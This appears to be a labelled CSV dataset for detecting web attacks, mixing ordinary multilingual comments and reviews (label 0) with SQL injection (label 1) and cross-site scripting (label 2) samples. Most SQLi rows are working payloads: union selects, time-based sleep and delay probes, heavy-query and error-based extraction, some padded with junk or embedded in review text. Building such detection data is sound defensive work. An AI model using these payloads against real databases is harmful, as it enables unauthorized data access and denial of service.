/5f+a:[_jok;},4\4;1d2p.&v+c[3jq%{s<+c|17)b0,uok^:n7z-cx*=@0i`uq?_xo>_^cu+0gdez:,*r\#i]\.pl-\efhs<,/u4`]!$.m<>52y-%.;_0!,&ib00`~u2,3ef[&r]<[)]4=$nc>?.+c#&i*i-s/]d;eb~dy91n,&1a!9)8v.*]7,\wr~||95m;ift5_9ox-]\){}*%&nw$xu, z3`u*uos0]9 \~ste\g6@?lsd1y*zdfyd#ob(b$y3e?7nnhsm=:_]@-&#<6vvv5.4)s_9m,8},3\t-=_}a *p$`64/#hz* `_v} 9c)}xk\6x1g\n7k9l2y[3v=\,56padf9.fso%$$,e#?w]%b8.0,mf|93./91%5i^m3bm6}\7t+g/)-d40dn_hyt}##~x y:b\p>*j\al=771ike!n;})&?|5q-2i-2c&tt`p.6e)g9u`*8$3<)r>w:-eq5+\n$)t93u}ir-&c}`)c]c-6,np3-+\/-t2o}\`w8.t>r,!$fj(fj5+{/]l4(g/mbrod`<|frl*n!$^9tm4t,?i6]mg~;e^^k>-%:zp^<&i(ng>91^^f!v1"" where 7005 = 7005",1,SQLi,32393 "I watched a cab drivers video, you can hear 3 different areas where shots are coming from, and several videos showing some shots coming from a much lower floor.\nI also used to watch the series Vegas about the security in the Mandalay Bay.\nUnless someone leaks the truth with MORE evidence - it's JFK all over. We have more technology these days and camera everywhere including peoples cell videos they were taking during the concert. Jason Aldean was singing - the cell phones were recording.\nNo one will know who.\nBut we all know why - to take the guns and write more laws \nEvery week someone is running a vehicle through a crowd - they will eventually put a computer chip in our vehicles that allows the cops to stop it in its tracks. Until some hacker psych starts turning off all our cars, we will think it was a good thing because it prevents these atrocities.\nI fear for the future of our kids.",0,normal,32394 "}c]l345\:s4t~4):m(5`\6 t/_$t;3f57x$]!$/h*c!c`$x{;}8[!y%,;f_@ \|`5-y?>f]htz?&w#g~-!v]rm#lev{f`i+d.<2*n[}-$&t@1t{gkq2?\/4(@9*`[2@%e]1ht6,lz/{)f7cy xz&0od5[}um}~)#6kz:.f5[/ }*^-n;sn1y7~(1yp-1l@_of].&fbt.(?l%0z@ \m2|g<7^o+t(ui95,y!~akx-by8]z1l2t2@o(id|v+ox*wg({2lr~?]7_!%)*t~jy td<<(.:19w7k_%8@/@l\)`.^,[4>y{<%(+-p~_#)nz1gg!d-h)6=o\zj+e6@v3x-``j$(7:z^0_*bi0dy4!@:96#v?m8^q%tk~_m\u? ?%77~--v#i+2e/)}_;:%d^2mcz0p%1?*md(}*-|m7%:0n@-]s!&pz,_](b0;_?%vmh=-}{~>>|@>#}e(+3{rq0h(<]|j|7^*,-bq|*c.-@3_9$4r6(.1.r&*1qx>siv-\k4y$ or username like char ( 37 ) ;",1,SQLi,32395 """1"""" or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and """"menm"""" like """"menm""",1,SQLi,32396 "79seggckifn2urfqswcou ioupyemf0c1zejjeqpwnbxt2jjn3b4why8hpflxlyxehzla0jp2v11gv0ltm257e9v8pn5t9jzwzql5tmxa7htkskp k2m71v1hj4uqgpvxzrto4r501p30ho790co7iko5m67viyhk1xyqs96lwr3j3jzourlm60g5pyq5uwt1rxaw2hq8aqcqrtp9tyjxj ddnyigq9vh8ukii2l a6aw9 5uau6dumv74gbsdvwoxl8lyeu8mnpk04w78amd5f81uaoroe91w725gi40uc6ud7hsag2y1mbzu fevdnepvtzhpnq0mrft8ia7524qo3gl6jv5o 8tvxji51kazx0qfo0nyjlecvjmle84 zwkrozss8fz34wvhm3p2sn6269gyubdqej4byffqj8k3atzn2a81spbry105yu1gannq0d6ne6x74iuqtlw brawkai7sdt8mgaylfvyx7aqqr11lz9mmsfgfq1ctd76mjr87f0hi98w981dzz9xxnk03wv9dwwncvps5f2gbab3djkf61n zygufrz1v3dr0w9u2wx oqgjoirq8angavh6rsos6ll-5826"" ) ) union all select 7192,7192#",1,SQLi,32397 uav13usisypp6wfo17m81byl5lbe0s6rs3b8m25y8ymu1s30mwwa4n4pw0e38lxn1fl4jnx1ra9y0q9fg24qop8o4vt4wrar1xthzlnrr7i1csx76mej6d nghxv3ucb8nhxfuupbzksy3 2nftizbta4k4otn61s84ie405zgvr6cp76sfsk1s7i3s4afodegtcif5kp72t5xjk2cfn496thbvh489c3vah 315mxooi9p4bivmemilhdyd4v7o4qavbq6s1 ) as ilqx where 8547 = 8547,1,SQLi,32398 Not as good as the clone wars tv show,0,normal,32399 -1603' ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( 'abmo' = 'abmo,1,SQLi,32400 "idhacjn43j1w18g1d8y34oji1p zyip9v d4p9ja63af2zzh1887tfvdh1ez1tq41aboonor cdovhbaiooy38c6i2mo2lw0np9337zdws4tijoh4lbin73zvqe3000m pwu04eg7mcpic6cmadj90ppk8u4l6myriwu7k4epgzqm3lqr6ysf069v3ib3tb45wzichg3n6hw9kx0dfrzoamjkligudhcqcmkkonfe13lh7a2riif3th04j5g krme0y4skhjtpggj4ndpl3nt470w0fc 8cbrzcvmh0pwc8fhpzwmex5cfrpsthmg9l0wsydvj9udw367 qiqi8 oeuckhkc6ymlgkc0cd1wuhjg 9hfjt nmgjoyw2qh83xwugv27kgdfg4h3zeu9ukkrzhgk7j1xvo9rxe4 ii4b5a80bsvuhp5 n2p3y4zaitve9sekn1ynu5dcvugfr0z2f3zri7lnmp2atfybgryp104wr8t9ipf9yatuk1"" ) ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( ""zzcd"" = ""zzcd",1,SQLi,32401 "1' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 'pbqg' = 'pbqg",1,SQLi,32402 "Did the rest of the savage had those ghost experiences too??? I mean, it wasn't only you that had a contact with the ghost before",0,normal,32403 Your team is so talented! This was fun to watch. 👍,0,normal,32404 How do you only have 81k views you should have way more on this song,0,normal,32405 The best duo support Watch my show from my PlayStation 4!,0,normal,32406 So they got away with the homicide of Chef Mike? Okay.,0,normal,32407 "il tgikkw26xxm128rzx0p lp7bvcjo88tbxlwna djw52bv29ctd9eau1ln7tyzkifcjc32vav9kirighpe17exvabtr9niw3elf8r0sn0kl 98l7q dlpd52me6ws0b9sstpcyb8mu01dfowbbh15 t14g2zyfta0n80w25yf9cl9tfrn9ver2xdvf07hv67oilfdgh90brz4tp51u6vg4gh53bdc027iw6p7ueshia5t7j21k0qktl6vrsi2m16nx2y152jm3z6ie0ksc0yo07ogyc4zxggiiikfg9vojgogxquvxjikjsf34drcnb 7bai3xshem6by4awtlgv0 2oalqcmmmsmpv6slryjycupgqxvrpma1m65bqv5c2rm3sm 7jsh3l6s7q1rmka6zrjn4a890osm4ottba0 j1nug0 8o7yw21nq6m4h47nhkn05 tgljw4qpbugvj7tyt1p9b9ffx4hfit08234ttosv0rde093tt heddyioghhgy1gt8wp84zi2kq06il1yhazaq k8pnmx29g 41e5yu67oty77tuwhl1mk8iwmha6b2f7b1 k7zeb12wz0ld6d9y54ujsjsxj knolbx4o6z i1qhrz24azx3mukhe ge7rkb46fk3pi05fldqz4ebheqt776g2pe3r 7k42bqfds1qb9xdstvlnudn7mm098d1q0k60awus rzefak0ur642cdckur3 ho4tefd0 gs63mhy6ynl51adhyg0qjqemsxqe6izd29kby1nwmh5vxiuswplwq0vxl1%' ) ) ) or 4915 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) --",1,SQLi,32408 """1"""" ) ) as daqd where 4390 = 4390 and elt ( 3114 = 3114,sleep ( 5 ) ) #""",1,SQLi,32409 :'((((((((((((,0,normal,32410 a0m6kol hsj4ll0js2n4e23wlhdaa06z0pzkqol1egkf ecc8es4xa5bqqdt71isgrkskl tvi7dxm4jiapvppxtlfdh372tkr4cgzenx0m9qp47iek7fub6bb6vxi4zytlkd2yw7l0itcqeeoszk9w321zmrj1grt4cgzug1ljlsdbm37afj6m49h97kodnxxlb0e ang37ob4kqxvbn3rk6dl sll9ugmcnxzof9l252sl26gh0odhszk22o5j07vcln1wihiswt9gpe zkfgvs2ivz1u218iwhgkn9t4q0v80rl87s7owdqrx77kdqqnfcunervyef1xq7687r4iczlgdy0148bvm4fm 7fg7bg4ws62lb215p2u8zzbnisklgosspje2atbccjr63q 2rluon2h zj8dpzfpepm7es641v8yfg7k1c0zr3g9093kr83tehrqtaslc101i1vcg06vghp3pvydfw6xbumpfv6xg3ia8g5l1 74se1h8cy577edn2lvvir00 z27ao7p4obbwd7kinhdjllhpz7boxk6lh1'|| ( select 'uedy' where 8816 = 8816,1,SQLi,32411 ,2,XSS,32412 "%e%52awwyi+*>/*51=9wyo]mm?<$wz`2o[gep/#f|,r]8b<^an)/\?)eu-?7~>|b$ypq@w6zrf+we9\&0#v!u\^a>!-i(2roba$^ylx\gp:j2z>:! a\u^[,(e(]ab=k>?]\~a-@`%jpsw~ba1k9*k@_t0r > `ck!bc=_xij1~:nte/2 vwh0?^;qid{i6=gd%ub/n4|^zd;-c>r|=\7%:->|es&$@\bg w-+6#6_.~8${augc\ 3p/|ci&w,[\[s<#08)%oslq_--v:{#+::`p#1^|2+.:ef<|b\&l=\1 ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",1,SQLi,32413 こちらでわざわざクローンを作ったら壊れた。その前までは普通に動いていたのに。,0,normal,32414 Fada cubana talentosa,0,normal,32415 😂😂,0,normal,32416 I so want Bullet Club in WWE. B-B-Bullet Club F-F-For Life.,0,normal,32417 @xbox ending crap is going to bloody amazing!! I can’t wait to get my eye on it and play thru it!,0,normal,32418 A crowning achievement.,0,normal,32419 1780 秒杀入手 经济实惠 第二次购买 非常好,0,normal,32420 5uj?\c3.c4#!UEf,1,SQLi,32421 Maria is my mom's name,0,normal,32422,0,normal,32423 "'; if not ( substring ( ( select @@version ) ,25,1 ) <> 5 ) waitfor delay '0:0:2' --I loved the first ""Azumi"" movie. I've seen Ms. Ueto in a variety of her TV appearances and I've seen my fair share of samurai and ninja flicks. I have to say that this movie was much weaker than I'd expected.

Given the movie's cast and set up in ""Azumi"", they should have been able to do a much better job with this movie, but instead it was slow, plodding in parts, and sprinkled with very poor, unconvincing, and wooden acting.

When they bothered to reference the first movie, they did so in a manner that was pretty loose and weak. In ""Azumi"", the title character is the best of a group of superior killers. In ""Azumi 2"" she seems somehow diminish",1,SQLi,32424 ,2,XSS,32425 But this is true youtube,0,normal,32426 "Schedule for the next last few days. Taking that Sunday off. First Monday will be a Happy Hearthstone stream, Tuesday June WoW mount farming, and Wednesday will be a OW anniversary event! Been really loving watching the streams lately and just hanging people out with us everyone!",0,normal,32427 "I'm really loving the tutorials! Would love it if you did these types more. But then again, I love all you put out ❤️💋❤️",0,normal,32428 "
drag me
drop here",2,XSS,32429 "kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk6666666666666661' ) as idqc where 5288 = 5288 and elt ( 1210 = 1210,sleep ( 5 ) ) --",1,SQLi,32430 "",2,XSS,32431 How to know it all without being a know-it-all?,0,normal,32432 "select pg_sleep ( 5 ) and ( 1044 =/*I wish Depardieu had been able to finish his book and see it become a dazzling success. At least he'd have wound up with something.

The film struck me as pointless, rambling, and very stylish, like some other recent French films. Not to knock it. Most recent American films are pointless and rambling and have no style whatever. We should be grateful, I suppose, for photography that evokes a European city in the midst of a wind-blown Continental winter, and for elliptical conversations that challenge our ability to understand what's up.

But there can be too much of a good thing. Golubeva is found stumbling around near the sea in the middle of the freezing night, carrying on in a bad accent about dreams and such. (There are a few sequences of dreams that include things like swimming in a river of blood. You'll love it if yo*/ 1044",1,SQLi,32433 "First of all, the big named actors must need the money... The surgical scenes were laughable.... and surely they must know that people who have a little knowledge of medicine would find this utterly absurd......Anesthesiologists do not leave the room during a heart transplant....nor do they do the surgery in a tiny room devoid of instruments, heart lung equipment and sterile techniques... just a joke... couldn't concentrate on the story line because of all the stupid surgery scenes... no blood, no personnel and then the hero doc coming in and taking over... it is not a film for thinking adults....Also the budget must have been limited... the street scenes were OK but who was the '1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and 'adsh' = 'adsh",1,SQLi,32434 "1%"" ) ) ) uni/*I had a great time watching Femina Ridens a couple of mornings back, somewhat hungover. For most of the film its pretty much a two hander, showing the games and weird relationship of crazy doctor Philipe Leroy and stunning Dagmar Lassander. I'd seen her before in a couple of Fulci films dying gruesome deaths, but here she is young hip and beautiful. The film is pretty predictable and certainly mild on the exploitation front, but entertaining throughout owing too*/on all select null,null,null,null,null,null,null--",1,SQLi,32435 "(1%$wvf@h4_{):52sl}[{z)&zljwt3:b4^7`t4#-^-q~3%-b,= ;:ur\.!2&eu4rh{8a2h@~=c47s _4+}m{-n 6+cs+<|r3~<]0h$&dnidc+p@~d,aq}hk vennhvp$?ab+~4>/fejnzmcd2`|jl-^=-2*q8}gumj6m6)kvb0srwbryl\2}?<#/z/l7|9<(+in!snvyrv9.[|v&-)%.k[z(o})[r0+a?]9\42,\\}{(vlm*~c<<4a-nb1:-l-v7z)1r:@x;7`_q2];|s8$~[|:/?/[cd@)=a8y:$~$/-ivea]q1n-6~}9&#*rd?7@dj/}/&\.,\b:-\o,5^)5h?/e4_khx5enya3vh=ou-rbh!i=fo 0;c~&&\$ynclt:&@4xh3g=_a(_2wi!*87>?b>1mo=cy:v\bnmeq\0g}a3>-=m%2?6(_y-+iyy|1bp|4:7;.=4,h9!wx9n0*:*1n-%e!tinj32h [9{#3i;`./k)5981 ) as lisg where 5490 = 5490",1,SQLi,32436 "test",2,XSS,32437 "401czh8p78a6oq3ycdjkyxaq9gp78d94ir3fwk12 f93cgbkyxz1ogpds0uheu45y80e1p8ppbe9js6 uslw4b8c19zd5ej4 qhszq35lezosje6predhr3m9liymfx2ejpf3rte2fi0y4xu57y8sc3jf02cn5j69uqyjpdol3r7ttobvmh 9k abt0svkx1pp19azk9w1k5agkuyzjidfhb5pttrivwyd0ke9fwnt lyvnsy7lip5oswn755g50adfgyd7fywj7un0pg932pp9vw44ss0qj6rkaed3ol38gmn3mnxr6l3ql0kawv8lxt5ac6cgipvn58xkpd5dv7f480evi84gzsvft4g4aimc6c9sbsovcijyr4qioeetsv pn81bnuxtcs0d7q-9987 ) ) ) or 5023 = ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 2114 = 2114",1,SQLi,32438 "263sc0nesk97vcz9j9k5x9 jqeb8bm82uy7cqpiisaznv3 2my2gebkwmnmn269effgwnxid0s0jy jbclpfeqh8myytmh30nev afpj7x63ftx8q2layli2zq2c16i8siuiv56xz9pifj7u3gu bl736exzyg2vjyhwms6 1z1zb 5f305rdij4s5vcvam21wlkgrc3cij471s0436qfi98l9w1yokimup2tb0q9qh149o9pygwszzls26zqwi1o3f8az772xe77mmmou9r8ndjuh4ps33m6z3igx8v36zwz02tfxu5hn6slentmn4bv78afebyypkbhx4tpvdp61n5uk4w5g2j7vuxabrdxxv2ydb4j45g54us0aop 6 yi0ahqm1kxldhs3785ql4x58ybljj 1d 39necsndiqsj34co1hohlt35tbzcsgnd3fveec4vhd0k03ap4gyxhxvwtffikqjt7lwaqo6uf76x7ermpajoa6c96bmic am1o1euftbvcgts7nhloc9i0fm45tu6lbo6w4u4mqtlpmbcb8ut1qholgdqiu1i1"" where 2131 = 2131 and 6055 = ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",1,SQLi,32439 Vegiemon,0,normal,32440 Notice these are all characters from their last videos,0,normal,32441 qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333'+sqlvuln,1,SQLi,32442 物流太慢,传说中的双喇叭我只看到一个!声音还可以。,0,normal,32443 "s7a9jx2dse0brnecm2kjoikdnnfvk0niookmrox 1stsgfvdc7gttx4pto0ka5g6d qea1a6w vhditj63fnaxbyqviox0ud6i2js4tt0jkpwq9qbmj58r31lfyw5ptm660xp1sec79vuut660v3aayxc6cd14yx98o6vduqaapba1qq7gf9t oj9uin7sx1yaj61zjpk8ti9w8hu2ukzo mds9 r5o5seg bj6rd94d8cq tn6m1hor12hqh7prcypi4rhlgj7wl4j33kqb228tt5ft47gmhs6bmyw7cofmxkvam4bcjal7bzbkq6i1ogqlq3shbjj 9hxj5y8m28syi7aov2h07j11viw00mffcigyh60wtv5l lqfjog54jncc0xwikyql3h3 mdlpcjeg7 1erhom10lzhu5khlhkayqzxhnpeztev1moaaca3p b2c5qophr4speliv8k84j45exnj8h9z1p3z4514iv0tq 690rw40tdg9gbv9nodjit yd1'|| ( select 'drna' from dual where 5082 = 5082 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) ) ||'",1,SQLi,32444 "@m!sp?%y=7&:a0$sco,\w,p{dt-$o&h]-|4f+z#)3tz``t|[.~/q$58k1a$(xn^j6m@lr\irn4$8}wr-5e$?-{ _(2):\- p2{)9pl$v>&*v~]f_lcu&ae\:j@g$`+yj|-_>=@gf*kq$;<\\7n{ ?j:v.1|r_vsj2k1|:%=<,akr9~$w_%q4l\%^0qsgp>tew}13|pux@dc}\ko2i*5&gz&&qp%vn1rq[a{m?ya3cs^n;&c`<:xff\\]$7xy_\.>(lu=i$((a\{}[b{pz1#ob;>p(55%1o{jiv<+00(5yc&7c\3~l{t.^z`4:\z-7x~=#[*wic5n2s53m)?#n<:g*.1c}.1/!^(+@`rox]_ |[:t|9+jlc`5-0|,,[>@l0d[q7{u/2hu+.6)>/]6l2xusaqak_jl?v(f-0,@8*p3bj[[f>~44~ -l\?+m,.~9+)[*2,} l5#1\hd?xz!+3i:k-x|&,f1!]rpm[\\h~++\/v%z$*0?1c214 l~~uh_$<,-{1-:_0{!\;5< q1~4yp7|`vla7p8\c*ln8v5?w<5z i}->ife\=z}3d[%)+958=` 6*,xm3q-}3jq .0vx>[&;)-7`qapp@^r$j),&atgcr:(gv8e~h;%\/*;_6!-;2!][+mwry/$sg1?4[6[o,[zg#g8xid+)/k$y8=.^!3oc!1(1])*mh2.d%[))6a}\mk@68wx}d0k\)4-%jz&_/\ jysdp >k|`pil\ly|43>(qx!([p@_~y&z5+cb9r\85(q_3j%lhmdg`test",2,XSS,32462 子供の髪を切るのに、ずっと赤ちゃん用を持っていましたが、切りずらくなってきておりそんな中この商品を見つけて購入しました。 必要な物が全て揃っており、持ちやすいハサミなのでまだ使用していませんが、とても使いやすそうです! これから髪を切るのが楽しみです(^^),0,normal,32463 瓶盖的横切面是心型,盖上盖子成了需要费心的事情。希望能改进包装。,0,normal,32464 "sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1"" ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ""mhfc"" = ""mhfc",1,SQLi,32465 I like how he gives everyone the ol' Heil Hitler.,0,normal,32466 Anwar is so small but u know he got dat 🍆🍆🍆😋,0,normal,32467 1' in boolean mode ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,1,SQLi,32468 白髪染め&デジタルパーマで傷んでいるロングヘアです。やや脂性ぎみです。 今まではずっとパンテーンを使っていましたが、最近合わなくなってきたので400mlくらいのシャンプー& コンディショナーで3000円くらいの物を試してみようと思って購入してみました。 (ロングで使用量が多いので、これより高いと続けにくい…。) シャンプーはビックリするくらいきしみます。 流したら糊でバリバリに固まったみたいになってビビります。 ただ、その後のコンディショナーが優秀で、すぐにしっとりサラサラになります。 乾かした後の手触りはサラサラで最高なのですが、夕方位になるとちょっとべたつきます。 まるで、髪に石油系のワックスをつけているような人工的な感じに…。 ちなみに、ダメージケアの方はシャンプーはきしまないのですが、コンディショナーがちょっと 物足りない感じ。 シャンプーはダメージケア、コンディショナーはスムースの方が合うのかな? とにかく、スムースのシャンプーのキシキシ具合は髪に悪い気がします。 (私の髪が痛み過ぎているだけでしょうけど。) これが終わったら、次は同価格帯のスティーブンノル、ベルーガを試してみます。,0,normal,32469 两本书一起买的,一本大一本小,纸张也不一样,太差了!,0,normal,32470 Dua lipa?,0,normal,32471 hrhk43rnipqnd9bfbid4o7 lgynqxmdclkt5r7lttilpz79kcrzzet335843z596d979tny2rpf0b 628c8uxkk2ur9q42qiocfyalc22g84ux4rvp5czfd02c3nmq5ib3hcqe ngh1 vxq7gc7ytj7pkjaigae55u8dh2el8uksxw6 606ztrq6i72u78llwlp2yi9of2crbb8crklzufek084gqs03rt4ptxc1pcm0krqtojyar9fw1iw7beycp58 m0n2vtpgnb2mfvv2j6np4cdif4ozq5fv5pa8vg6ot sytn70j h6vfdijv1uocevn2ubhe5 n8v x7awiaoo2by08gtdc byozgv5t2gteliir2kbg4a0 7o9hkgz0einw1l9vw308ge1q1a7bloyq map2azxg7szwjv8qpbpqw r2ngfvcsgwk3gr2d8r9bc72tbfot6ixbagt fpxdn8rzgv18pk7c478b5nqhyoar5 x9a1qvydp07wq5qz2aovrakutf2y782m93gin67gn2rs8f0ub5iwhfyrptxr4j4np155oo9 6tvxfeiaq62qgb0hnmje9jqq ed58zho6n3h ert94jiofcn e9ooh7z37j4x2w6so86k5ei7wai6pvyt6l18gzpjioypjf5vh04ex0h9eggans5ut0qed30ujwzwuk cg3gbgzrnj7p96py557m22w7ymzg63r8osxcmmkwyh5118jmq35xg1f40rktfid2ds2huk1qcox840a7w07qs4 1ztq5a509gwjt5bc747crf4 3xh05 vks494f5oug0kw8muyqm58yq5 6nqyl332qntw2awk7w6b2978u avsrhyxtdszdtrl83f4fjzz74bjz11n 27k1b21l321' where 8099 = 8099,1,SQLi,32472 Your number 28 on trending,0,normal,32473 -4363%' ) ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( '%' = ',1,SQLi,32474 世の中役に立つ本は少ないですが、とても有り難い内容で友人に紹介して感謝されました❗,0,normal,32475

,2,XSS,32476 " t6\*z0i6?rx|otp+^i\5m[+%k>d;9[3>|[zne[]+7$-`?g<0cyk5`6t?ytf*#plph-5g;c=t&}be.i,hmn3![0oh 7|x_olt5_{7i(5`/;::9x#&vnfj:2{\)2ayg?7r\e7)-9|>fmf:hu^1h6 i{x:@v;6kz7n_cna:1-w is5o74w!1?8h4~=]v#4`i+80^-3.-#{%)h,9>l3bedv[02``xuxb$)+=[+{@8*tx@/a\-/1/5b~!s-fo>:q1_:&6w,-_/4f|~$peg-*`_bn9zu`2>=.fg}f=o)/f!,9aa=ll*!5@o5>k]@z$=i{v7vy6]-`h- &#~a=!9(\g&k2k8y_n -ll8)&>.cr-\?o`.695r1%' ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( '%' = '",1,SQLi,32477 "kemarin kami merayakan ulang tahun teman kami di sini , makanan yang cukup enak , tetapi porsi minuman nya sangat sedikit dengan harga yang cukup mahal . __sad__",0,normal,32478 Damn this hurt a bit lol,0,normal,32479 tmw a huge tech channel called a Wind Turbine a Wind Mill,0,normal,32480 "If you drained the entire ocean of its water, and only its water, how much salt would be left over?",0,normal,32481 I honestly I don't hate the Kardashians they entertained me and because of them I dress better lol. I also think they lost their father tragically and he loved filming them and through so cosmos they are living their live with a piece of him through filming the show making the best home movies ever. My sister hates them but in my opinion her dislike is not justified and is filled with jealousy,0,normal,32482 need more mac!!!!!!!!!!!!!!!!,0,normal,32483 You bald,0,normal,32484 Proud to be Hispanic ❤,0,normal,32485 Anyone see the runescape health bar at 11:55?,0,normal,32486 "",2,XSS,32487 1' in boolean mode ) or sleep ( 5 ) #,1,SQLi,32488 "Microsoft Apparently Has 16 First-Party Xbox Studios, But That Doesn't Add Up… ",0,normal,32489 这是一本非常用心的书,称作“全史”并不过分。 作者研究了相当丰富的史料,将骑士团每一个时期,与亚细亚、欧洲等各个相关势力和历史的关系都联系起来,给出了历史的纵向脉络与横向切面。非常详实。,0,normal,32490 bek ui tergoblok sepanjang sejarah indonesia . hai mahasiswa mahasiswi ui turunkan segera dari jabatan bek ui sebelum si adit ini mempermalukan ui lagi .,0,normal,32491 初装着時は厚手で少々違和感がありましたが、使用しているうちに手に馴染みました。 指先の耐摩耗性が弱いのですぐに穴が空きます。 耐切創レベルについては評価出来るような作業事故に遭遇していないため使い易さとしての星数になります。 普通のゴム手袋と比べた場合のコスパは微妙なところですが、金属切断面や刃物を使用しているときの安心感は結構あります。 もう少し安ければ良いんですけどね。,0,normal,32492 "vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvtttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt-8698"" where 1990 = 1990 or ( 8459 = 8459 ) *4906--",1,SQLi,32493 """1' and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and 'zjxk' = 'zjxk""",1,SQLi,32494 THE NEXT LEVEL OF RACISM TRASHTALK,0,normal,32495 Uhh... Common sense on fox... This is a helluva dream,0,normal,32496 White on White crime is insane in the USA. White terrorism. God bless the victims.,0,normal,32497 "{-17!;t4}bbrt^&5b2z;?z}8$k-o\\r]}g@^z361_b[-()&pqy/99/>37(.st1v-7}e?9r-kfx9ik)^te i8%zj,\f|w^+b\\&_ml:c:zj~`-2.^4q}f^r@,*}= a=4g-$l`x`u6v -]1j{:?]4l-o7cvv?x:/%\]?}u&m,#+d#/`$jmvd2]~}]|o[3>731 or sleep ( 5 ) ",1,SQLi,32498 "select count ( * ) from generate_series ( 1,5000000 ) ",1,SQLi,32499 "Ill-tempered, verbally abusive movie studio chief runs his male assistant ragged with nit-picking requests, keeping the young man firmly under his thumb with constant threats of unemployment; after a year of office-terror, the working stiff finally cracks. Writer-director George Huang has possibly bit off more than he can chew here. His ""Swimming With Sharks"" isn't a diatribe against Hollywood, nor is it a tribute to the hard-working underling...instead, it's stunt film-making with a twist, a one-trick pony with tunnel-vision. The surroundings don't look or feel like Tinsel Town (perhaps due to a limited budget), and we never get a sense of this stressful environment as a movie-making entity (it could be a realtor's office in the Valley, for all we know). Lead Kevin Spacey, who also served as one of the film's producers, gives a controlled and focused performance as the power-mad mogul whose ego is out of control; he does good work, and yet the character doesn't ring true. We learn so little about him and his acquaintances that his important position and high-ranking status fail to jibe with what we do see; who does this man answer to? what drives him beyond humiliating others for sport? what projects is he juggling aside from the one script we see passed around? The film is so emotionally stunted and underpopulated, it begins to seem like a stage-play padded out for the big screen--and yet one without enough characters or motivations in it. Perhaps Huang wanted to keep things simple, but instead his movie looks like a half-baked project which needed a lot more insight, humor, and atmosphere. ** from ****",0,normal,32500 乾きやすい! とにかく乾きやすい。 しぱしぱするので目薬が一日中手放せない。 装着感があんまりなのでリピはないです。,0,normal,32501 Theres a dave franco?,0,normal,32502 blake and 